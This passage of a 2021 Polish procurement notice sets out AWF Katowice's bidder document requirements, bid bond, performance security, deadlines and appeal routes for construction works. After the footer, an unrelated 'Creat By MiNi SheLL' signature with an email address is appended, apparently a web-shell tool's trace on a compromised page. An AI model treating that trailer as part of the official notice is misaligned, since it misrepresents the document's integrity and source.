zasoby w następującym zakresie:<br/>a) informacji z Krajowego Rejestru Karnego sporządzonej nie wcześniej niż 6 miesięcy przed jej<br/>złożeniem, w zakresie określonym w:  art. 108 ust. 1 pkt 1 i 2 ustawy u.p.z.p<br/> art. 108 ust 1 pkt 4 u.p.z.p. dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne<br/>tytułem środka karnego,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) dokumenty potwierdzające, iż Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia<br/>ze wskazaniem sumy gwarancyjnej tego ubezpieczenia min 1.000.000,00 zł<br/>3) Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed upływem terminu<br/>składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) na potwierdzenie<br/>spełnienia warunku udziału w postępowaniu z podaniem ich rodzaju i wartości, dat i miejsca wykonania<br/>i podmiotów na rzecz, których roboty budowlane zostały wykonane oraz załączeniem dowodów<br/>określających czy roboty te zostały wykonane należycie. Wykonawca w w/w wykazie wskazuje<br/>wyłącznie roboty budowlane o charakterze związanym z przedmiotem zamówienia i określonym<br/>warunkiem udziału w postępowaniu wraz z ujawnieniem wszystkich niezbędnych informacji do ich<br/>weryfikacji. Do wykazu dla co najmniej jednej roboty Wykonawca ma obowiązek załączyć dowód, iż<br/>roboty zostały wykonane należycie zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.<br/>Dowodami, o których mowa powyżej w myśl § 9 ust 1 pkt 1) Rozporządzenia Ministra Rozwoju, Pracy i<br/>Technologii z dnia 23 grudnia 2020r w sprawie podmiotowych środków dowodowych oraz innych<br/>dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty.<br/>4) Wykaz osób, które zostaną skierowane przez Wykonawcę do realizacji zamówienia<br/>odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacją na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia oraz zakresu wykonywanych przez nie<br/>czynności, wraz z informacją o podstawie dysponowania tymi osobami. W wykazie należy wskazać<br/>osobę/y, która/e będzie/będą brała/y udział w realizacji zamówienia i posiadają uprawnia do pełnienia<br/>samodzielnej funkcji technicznej w budownictwie polegającej na kierowaniu budową lub innymi<br/>robotami budowlanymi w specjalności związanej z przedmiotem zamówienia i określonym warunkiem<br/>udziału w postępowaniu wraz z ujawnieniem wszystkich niezbędnych informacji do weryfikacji<br/>uprawnień.<br/>Uprawnienia winne być wydane na podstawie aktualnych przepisów ustawy z dnia 7 lipca 1994 r.<br/>ustawy z dnia 7 lipca 1994r Prawo budowlane (Dz.U z 2020r poz. 1333 ze zm.), lub wydane na mocy<br/>wcześniej obowiązujących przepisów zgodnie z treścią art. 104 ustawy , których zakres uprawnia do<br/>pełnienia funkcji kierownika robót budowlanych w zakresie wskazanym powyżej. Zamawiający będzie<br/>również honorował uprawnienia nadane obywatelom państw Europejskiego Obszaru Gospodarczego<br/>oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a ustawy Prawo budowlane oraz ustawy z<br/>dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394) oraz art. 20a ustawy z dnia 15 grudnia 2000 r.<br/>o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r.<br/>Nr 5, poz. 42 z późn. zm.). Osoba/y, o której/ych mowa powyżej, musi/szą być członkiem właściwej<br/>izby samorządu zawodowego, <br/>4) Oświadczenie na temat wielkości średniego rocznego zatrudnienia – załącznik nr 10. Zamawiający<br/>wymaga, aby Wykonawca w okresie ostatnich trzech lat przed upływem składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie – posiadał średnioroczne zatrudnienie (umowa o<br/>pracę nie mniej niż ¾ etatu) w liczbie co najmniej 10 pracowników</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga składania przedmiotowych środków w tym zakresie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> oferta Wykonawcy winna zawierać:<br/>• wypełniony i podpisany formularz ofertowy (zgodny ze wzorem, stanowiącym załącznik nr 1 do<br/>SWZ)<br/>• kosztorys ofertowy, sporządzony w oparciu o:<br/>- plan sytuacyjny stanowiący Załącznik nr 6 do SWZ,<br/>- przedmiary robót, stanowiące Załącznik nr 7 do SWZ,<br/>• Potwierdzenie odbycia wizji lokalnej tj. kopię elektroniczną potwierdzenia otrzymanego od<br/>Zamawiającego z przeprowadzonej na obiekcie wizji lokalnej,<br/>W przypadku, gdy wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby na zasadach określonych w art. 118 ust 1 u.p.z.p. w celu oceny, czy stosunek łączący<br/>Wykonawcę z podmiotami udostepniającymi zasoby gwarantuje rzeczywisty dostęp do tych<br/>zasobów Wykonawca składa zobowiązanie podmiotu udostępnianego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie winno określać w<br/>szczególności:<br/> zakres dostępnych Wykonawcy zasobów podmiotu udostepniającego zasoby,<br/> sposób i okres udostępniania Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostepniającego te zasoby przy wykonywaniu zamówienia,<br/> czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w<br/>postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia,<br/>zrealizuje usługi lub roboty budowlane, których wskazane zdolności dotyczą,<br/> czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą,<br/>Pozostałe dokumenty, które winien Wykonawca załączyć do oferty:<br/>• dowód wniesienia wadium.<br/>• aktualny dokument potwierdzający zasady reprezentacji wykonawcy tj. odpis lub informacja z<br/>Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej<br/>lub innego właściwego rejestru o ile nie jest on dostępny w bezpłatnych i ogólnodostępnych<br/>elektronicznych bazach danych, których adres internetowy wykonawca wskazał w oświadczeniu<br/>stanowiącym załącznik nr 4 do SWZ. W przypadku wskazania bazy danych, w której dokumenty<br/>są dostępne w innym języku niż polski, Zamawiający może po ich pobraniu wezwać Wykonawcę<br/>do przedstawienia tłumaczenia dokumentu na język polski,<br/>• w przypadku, gdy wykonawcę reprezentuje pełnomocnik – pełnomocnictwo określające zakres<br/>umocowania pełnomocnika lub inny dokument potwierdzający umocowanie do reprezentowania<br/>wykonawcy,<br/>• w przypadku oferty składanej przez wykonawców, którzy wspólnie ubiegają się o udzielenie<br/>zamówienia (w szczególności członków konsorcjum oraz wspólników spółki cywilnej) (art. 58 ust.<br/>2 u.p.z.p.) – aktualny dokument potwierdzający ustanowienie pełnomocnika do reprezentowania<br/>w/w wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.<br/>Zamawiający dopuszcza złożenie umowy regulującej współpracę i zasady reprezentacji<br/>podmiotów występujących wspólnie w szczególności umowę spółki cywilnej jako dokumentu<br/>równoważnego z pełnomocnictwem. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wysokość i termin wnoszenia wadium:<br/>Wykonawca przystępujący do udziału w postępowaniu zobowiązany jest do wniesienia wadium<br/>w wysokości: 5 000 zł (słownie: pięć tysięcy złotych 00/100)<br/>Wadium należy wnieść przed upływem terminu składania ofert (w przypadku wnoszenia wadium<br/>w formie pieniężnej wpłaca się przelewem na rachunek bankowy Zamawiającego o skuteczności<br/>wniesienia decyduje data uznania rachunku bankowego Zamawiającego).<br/>Forma wadium:<br/>Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu – przelewem na rachunek bankowy zamawiającego,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( tj. Dz. U. z<br/>2020r. poz.299).<br/>Wadium wnoszone w formie innej niż pieniężna:<br/>Wadium wnoszone w innej formie niż pieniądze musi:<br/>1) być ważne przez cały okres związania ofertą,<br/>2) zapewniać możliwość zaspokojenia roszczeń zamawiającego bezwarunkowo, nieodwołalnie i<br/>na jego pierwsze żądanie,<br/>3) przewidywać możliwość zatrzymania przez Zamawiającego wadium wraz z odsetkami w<br/>przypadkach określonych w art. 98 ust. 6 u.p.z.p.<br/>Sposób wnoszenia wadium:<br/>1) wadium wnoszone w pieniądzu wpłaca się przelewem na konto Akademia Wychowania<br/>Fizycznego im. Jerzego Kukuczki w Katowicach – ING Bank Śl. nr 21 1050 1214 1000 0024<br/>4199 8107<br/>2) z adnotacją „Wadium w sprawie nr ZP/09/2021”, zaś potwierdzenie dokonanej wpłaty w<br/>formie zaleca się dołączyć do oferty.<br/>3) wadium wnoszone w pozostałych formach winno być wniesione przy użyciu środków<br/>komunikacji elektronicznej, dokument poręczenia lub gwarancji winien być złożony w oryginale<br/>w postaci elektronicznej podpisane przez Gwaranta, tj. wystawcę gwarancji/poręczenia zgodnie<br/>z właściwymi przepisami prawa regulującymi zasady wystawienia gwarancji/poręczenia.<br/>Uwaga: oryginał dokumentu należy złożyć, jako osobny plik (w sposób pozwalający na jego<br/>zwrot bez naruszenia jej integralności) obok innych plików stanowiących ofertę i skompresować<br/>do jednego pliku, jako archiwum (ZIP)<br/>Zwrot wadium:<br/>1) Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej z okoliczności:<br/>• upływu terminu związania ofertą;<br/>• zawarcia umowy w sprawie zamówienia publicznego;<br/>• unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie zostało<br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia<br/>2) Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku<br/>zwraca wadium wykonawcy:<br/>• który wycofał ofertę przed upływem terminu składania ofert;<br/>• którego oferta została odrzucona;<br/>• po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana<br/>jako najkorzystniejsza <br/>• po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>3) Złożenie wniosku o zwrot wadium powoduje rozwiązanie stosunku prawnego z wykonawcą<br/>wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wysokość zabezpieczenia: Wysokość zabezpieczenia należytego wykonania umowy wynosi 3%<br/>-ceny całkowitej podanej w ofercie.<br/>Forma zabezpieczenia: Zabezpieczenie należytego wykonania umowy może być wnoszone<br/>według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo – kredytowej,<br/>z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,<br/>3) gwarancjach bankowych,<br/>4) gwarancjach ubezpieczeniowych,<br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9<br/>listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>Zabezpieczenie w formie pieniężnej: Zabezpieczenie w formie pieniężnej należy wnieść przed<br/>zawarciem umowy. Zabezpieczenie powinno wpłacone przelewem na rachunku bankowym<br/>Zamawiającego przed podpisaniem umowy. Rachunek bankowy Zamawiającego na który należy<br/>wpłacić zabezpieczenie: ING Bank Śl. nr 21 1050 1214 1000 0024 4199 8107.<br/>Na wniosek wykonawcy wadium wpłacone przez niego w formie pieniężnej może być zaliczone<br/>na poczet zabezpieczenia należytego wykonania umowy.<br/>Zabezpieczenie w innej formie niż pieniężna: Zabezpieczenie wnoszone w pozostałych formach<br/>musi być przesłane na adres mailowy aifz@awf.katowice.pl na co najmniej 2 dni przed dniem<br/>podpisania umowy, zaś oryginał doręczony zamawiającemu co najmniej w dniu podpisana<br/>umowy.<br/>Wymogi dotyczące zabezpieczenia:<br/>Zabezpieczenie należytego wykonania umowy:<br/>1) wnoszone w innej formie niż pieniężna musi być ważne przez okres od dnia podpisania<br/>umowy do 15 dnia po upływie okresu obowiązywania rękojmi i gwarancji z zastrzeżeniem pkt 3<br/>2) wnoszone w innej formie niż pieniężna musi zapewniać możliwość zaspokojenia roszczeń<br/>zamawiającego bezwarunkowo, nieodwołalnie i na jego pierwsze żądanie.<br/>3) jeżeli okres, na jaki ma zostać wniesione zabezpieczenie, przekracza 5 lat, zabezpieczenie w<br/>pieniądzu wnosi się na cały ten okres, a zabezpieczenie w innej formie wnosi się na okres nie<br/>krótszy niż 5 lat, z jednoczesnym zobowiązaniem się wykonawcy do przedłużenia<br/>zabezpieczenia lub wniesienia nowego zabezpieczenia na kolejne okresy<br/>Zwrot zabezpieczenia:<br/>Zabezpieczenie zostanie zwrócone w następujący sposób:<br/>1) 70% zabezpieczenia w terminie 30 dni kalendarzowych od dnia wykonania zamówienia i<br/>uznania przez Zamawiającego za należycie wykonane (dzień podpisania przez zamawiającego i<br/>wykonawcę protokołu końcowego odbioru przedmiotu umowy),<br/>2) 30% zabezpieczenia w terminie 15 dni kalendarzowych po upływie okresu rękojmi i gwarancji <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego<br/>na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 2 do SWZ.<br/>Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem<br/>zawartym w ofercie.<br/>Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy,<br/>stanowiącym Załącznik nr 2 do SWZ.<br/>Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy<br/>pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://awf-katowice.logintrade.net/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> ŚRODKI OCHRONY PRAWNEJ<br/>Środki ochrony prawnej przysługują Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał<br/>interes w uzyskaniu zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia<br/>przez Zamawiającego przepisów u.p.z.p.<br/>Środki ochrony prawnej wobec ogłoszenia wszczynającego postępowanie o udzielenie<br/>zamówienia oraz dokumentów zamówienia przysługują również organizacjom wpisanym na listę,<br/>o której mowa w art. 469 pkt 15, oraz Rzecznikowi Małych i Średnich Przedsiębiorców<br/>Odwołanie przysługuje na:<br/>• niezgodną z przepisami ustawy czynność zamawiającego, podjętą w postępowaniu o<br/>udzielenie zamówienia, w tym na projektowane postanowienie umowy<br/>• zaniechanie czynności w postępowaniu o udzielenie zamówienia, do której zamawiający był<br/>obowiązany na podstawie ustawy;<br/>Odwołanie wnosi się do Prezesa Krajowej Izby Odwoławczej..<br/>Na orzeczenie Krajowej Izby Odwoławczej oraz postanowienie Prezesa Krajowej Izby<br/>Odwoławczej, o którym mowa w art. 519 ust. 1 ustawy Pzp, stronom oraz uczestnikom<br/>postępowania odwoławczego przysługuje skarga do sądu. Skargę wnosi się do Sądu<br/>Okręgowego w Warszawie za pośrednictwem Prezesa Krajowej Izby Od¬woławczej.<br/>Szczegółowe informacje dotyczące środków ochrony prawnej określone są w Dziale IX ustawy<br/>Pzp.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-06 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com